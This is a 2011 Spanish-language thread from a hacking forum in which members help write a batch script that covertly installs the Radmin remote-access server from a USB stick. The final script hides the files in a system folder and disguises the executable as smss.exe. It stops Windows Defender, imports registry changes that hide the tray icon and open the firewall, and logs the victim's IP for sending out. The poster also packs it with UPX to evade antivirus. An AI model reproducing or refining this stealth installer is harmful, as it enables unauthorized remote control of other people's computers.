• Inicio
  • Blog
  • Creandolared
  • Buscar
  • Ingresar
  • Registrarse

    • Hack x Crack - Comunidad de Seguridad informática »
    • Programación »
    • Scripting »
    • Batch / Bash »
    • Como mejorar este código?
    ¿Quieres aprender de páginas web? Visita la comunidad Creandolared
    • Imprimir
    Páginas: [1]   Ir Abajo

    Autor Tema: Como mejorar este código?  (Leído 2618 veces)

    Desconectado Ratamalvada

    • { L2 } Nativo Digital
    • **
    • Mensajes: 124
      • Ver Perfil
    Como mejorar este código?
    « en: Julio 01, 2011, 02:19:28 pm »
    Hola, aqui tengo un código que hice para instalar el Radmin de manera oculta a traves de un USB.
    Me gustaría que me ayudárais a añadirle alguna mejoras(en especial mrobles)
    Código: [Seleccionar]
    echo off
    cls
    if exist "%SystemRoot%\system32\drivers\system\R_server.exe" goto Explorer
    set ruta=%SystemRoot%\system32\drivers\system
    mkdir %ruta%
    copy r_server.exe %ruta%
    copy AdmDll.dll %ruta%
    attrib +s +h +r %ruta%
    attrib +s +h +r %ruta%\*.*
    regedit /s reg.reg
    %ruta%\r_server.exe /install /silence
    %ruta%\r_server.exe /start
    :EXPLORER
    Explorer \
    Me gustaría añadirle alguna cosa como que cerrara el proceso del [email protected]$ Defender o alguna manera de obtener la ip externa desde el mismo y poder enviarmela.
    PD:Todo esto despues lo compilaré a exe
    Gracias.
    En línea




    Tu corazón está encriptado con una key WPA2 de 64 caracteres hexadecimales. Aún así, lo intento descifrar...

    Desconectado kinko89

    • { L1 } Newbie
    • *
    • Mensajes: 69
      • Ver Perfil
    Re:Como mejorar este código?
    « Respuesta #1 en: Julio 01, 2011, 05:02:02 pm »
    hola para cerrar procesos es taskkill /f /im proceso.exe
    /f es para cierre forzoso.
    /im nombre de imagen | Especifica el nombre de imagen del proceso que se va a terminar. Puede usarse el comodín '*' para especificar todas las tareas o nombres de imagen.
    eso si az la ayuda de ese comandotaskkill /? si no sabes el nombre del proceso buscalo en la red lo tipico el como mejorar el codigo tendria que mirarlo un poco mas.
    Para la Ip externa pon tracert www.google.es la web puedes cambiarla.
    tracert lo que hace es decirte por cuantos routers salta para llegar al destino el primero suele ser el tipico 192.168.1.1 que es el de router el segundo es tu IP o la ip de la victima si le has infectado el ordenador.
    poniendolo en un tracert www.google.es > txt.txt se te creara el txt eso si tendras que buscar como enviarte ese archivo a tu correo.
     Espero que esto te valga
    En línea

    Desconectado Ratamalvada

    • { L2 } Nativo Digital
    • **
    • Mensajes: 124
      • Ver Perfil
    Re:Como mejorar este código?
    « Respuesta #2 en: Julio 01, 2011, 10:06:17 pm »
    Gracias Kinko, lo de tracert no lo había pensado, pero lo pongo y no me da mi ip externa, me sale otra muy parecida, pero que no es.
    En cuanto a lo de taskkill ya lo sabía, pero al ponerlo no me lo ejecuta porque creo que no lo puedo ejecutar despues de ejecutar r_server.exe, y si lo pongo antes de él no se me ejecuta r_server.exe...
    así que haber si encuentro algo...
    En línea




    Tu corazón está encriptado con una key WPA2 de 64 caracteres hexadecimales. Aún así, lo intento descifrar...

    2Fac3R

    • Visitante
    Re:Como mejorar este código?
    « Respuesta #3 en: Julio 02, 2011, 12:18:42 am »
    Haz el code completo como pensarias dejarlo y te ayudamos a mejorarlo ;).

    Edito:

    Suponiendo que vas a ejecutarlo de forma "escondida" con el AutoRun. Creo que aun te falto leer mas de las revistas, ya que aca lo tienes con una dll y el exe, al final del ejercicio de la revista quedamos con 2 dll`s que podemos ejecutar juntos con un code, te recomendaria hacerlo asi.

    Tengo la duda de esta linea:

    Código: [Seleccionar]
    regedit /s reg.regDisculpa mi ignorancia ;D

    Para las demas ideas te recomiendo busques algo sobre "Net stop" o "Net start" ya sabras que son muy utiles.
    Zalu2
    « Última modificación: Julio 02, 2011, 07:15:29 am por 2Fac! »
    En línea

    Desconectado Ratamalvada

    • { L2 } Nativo Digital
    • **
    • Mensajes: 124
      • Ver Perfil
    Re:Como mejorar este código?
    « Respuesta #4 en: Julio 02, 2011, 03:07:13 pm »
    Cita de: 2Fac! en Julio 02, 2011, 12:18:42 am
    Haz el code completo como pensarias dejarlo y te ayudamos a mejorarlo ;).

    Edito:

    Suponiendo que vas a ejecutarlo de forma "escondida" con el AutoRun. Creo que aun te falto leer mas de las revistas, ya que aca lo tienes con una dll y el exe, al final del ejercicio de la revista quedamos con 2 dll`s que podemos ejecutar juntos con un code, te recomendaria hacerlo asi.

    Tengo la duda de esta linea:

    Código: [Seleccionar]
    regedit /s reg.regDisculpa mi ignorancia ;D

    Para las demas ideas te recomiendo busques algo sobre "Net stop" o "Net start" ya sabras que son muy utiles.
    Zalu2
    regedit /s reg.reg importa de manera silenciosa al registro el archivo reg.reg, que está configurado a mi gusto, como que no muestre icono en es systray y demás. También añade una excepción al Firewall de Windows XP, pero el de Vista no se en que clave se guarda... :-\
    Claro que conozco Net start y stop, pero no había caido en eso, gracias.
    Voy a mirar eso que dices de las 2 dll's en la revista y pongo el código final.
    Thanks.
    « Última modificación: Julio 02, 2011, 03:15:38 pm por Ratamalvada »
    En línea




    Tu corazón está encriptado con una key WPA2 de 64 caracteres hexadecimales. Aún así, lo intento descifrar...

    2Fac3R

    • Visitante
    Re:Como mejorar este código?
    « Respuesta #5 en: Julio 02, 2011, 07:50:38 pm »
    Cita de: Ratamalvada en Julio 02, 2011, 03:07:13 pm
    regedit /s reg.reg importa de manera silenciosa al registro el archivo reg.reg, que está configurado a mi gusto, como que no muestre icono en es systray y demás. También añade una excepción al Firewall de Windows XP, pero el de Vista no se en que clave se guarda... :-\
    Claro que conozco Net start y stop, pero no había caido en eso, gracias.
    Voy a mirar eso que dices de las 2 dll's en la revista y pongo el código final.
    Thanks.

    Vaya cada dia se aprenden cosas nuevas  ;D, suerte con tu codigo y cuando tengas terminado postealo y te damos algunas ideas para mejorarlo  ;)
    Zalu2
    En línea

    Desconectado Ratamalvada

    • { L2 } Nativo Digital
    • **
    • Mensajes: 124
      • Ver Perfil
    Re:Como mejorar este código?
    « Respuesta #6 en: Julio 02, 2011, 10:34:06 pm »
    El codigo final queda así:
    Código: [Seleccionar]
    if exist "%SystemRoot%\system32\drivers\system\smss.exe" goto instalado
    set ruta=%SystemRoot%\system32\drivers\system
    mkdir %ruta%
    net stop "Windows Defender"
    copy smss.exe %ruta%
    copy AdmDll.dll %ruta%
    attrib +s +h +r %ruta%
    attrib +s +h +r %ruta%\*.*
    regedit /s system\reg.reg
    %ruta%\smss.exe /install /silence
    %ruta%\smss.exe /start
    tracert -h 3 www.google.es>%ruta%\ip.log
    copy %ruta%\ip.log \log.pot
    :instalado
    explorer \
    exit
    :END
    explorer \
    exit
    este código lo he pasado a exe y como me lo detectaba el antivirus lo he empaquetado con UPX(el ejecutable), y lo he copiado a un pen, pero ahora me surge otra duda, ya que veo que el autorun.inf en Vista no me funciona, así que si saben alguna manera, diganmela...
    Tambien acepto sugerencias para mejorar el código, por supuesto...
    En línea




    Tu corazón está encriptado con una key WPA2 de 64 caracteres hexadecimales. Aún así, lo intento descifrar...

    • Imprimir
    Páginas: [1]   Ir Arriba
    • Hack x Crack - Comunidad de Seguridad informática »
    • Programación »
    • Scripting »
    • Batch / Bash »
    • Como mejorar este código?
     

    • SMF | SMF © 2013, Simple Machines
    • XHTML
    • RSS
    • WAP2
    Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso... Learn more